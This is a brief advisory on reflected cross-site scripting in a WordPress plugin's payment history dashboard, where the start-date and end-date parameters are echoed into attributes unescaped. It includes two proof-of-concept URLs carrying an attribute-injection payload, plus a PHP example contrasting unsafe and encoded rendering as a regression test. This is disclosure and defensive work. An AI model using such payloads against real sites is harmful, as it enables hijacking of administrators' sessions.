The plugin does not escape the start-date and end-date parameters in the payment history dashboard before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues.
https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&start-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
https://example.com/wp-admin/edit.php?post_type=download&page=edd-payment-history&end-date="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
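
The missing escaping described above, as an added example that is not the plugin's own code: a date field rendered with and without attribute encoding, then parsed to see which attributes the browser would receive. The function names are hypothetical, and htmlspecialchars() stands in for WordPress's esc_attr() so the script runs without WordPress loaded.

```php
<?php
// Added example, not the plugin's code. All function names are hypothetical.

// Vulnerable pattern: the request value is concatenated into the attribute as-is.
function render_date_input_unsafe(string $name, string $value): string {
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode for an HTML attribute context. In WordPress code the
// call would be esc_attr(); htmlspecialchars() is the stand-in used here.
function render_date_input_safe(string $name, string $value): string {
    $encoded = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $encoded . '">';
}

// Parse rendered markup and return the attribute names found on the <input>.
function input_attribute_names(string $html): array {
    $previous = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $names = [];
    $input = $doc->getElementsByTagName('input')->item(0);
    if ($input !== null) {
        foreach ($input->attributes as $attr) {
            $names[] = $attr->nodeName;
        }
    }
    return $names;
}

// The start-date value from the advisory's URL after URL decoding ('+' is a space).
$payload = '" style=animation-name:rotation onanimationstart=alert(/XSS/)//';

// Attributes the template intends to emit; anything else came from the request.
$expected = ['type', 'name', 'value'];
$renderers = ['unsafe' => 'render_date_input_unsafe', 'safe' => 'render_date_input_safe'];

foreach ($renderers as $label => $render) {
    $attrs = input_attribute_names($render('start-date', $payload));
    $extra = array_values(array_diff($attrs, $expected));
    printf("%-6s attributes: %s | injected: %s\n",
        $label, implode(',', $attrs), $extra ? implode(',', $extra) : 'none');
}
```

The same attribute-name comparison can serve as a regression test for any template that reflects request parameters into attributes.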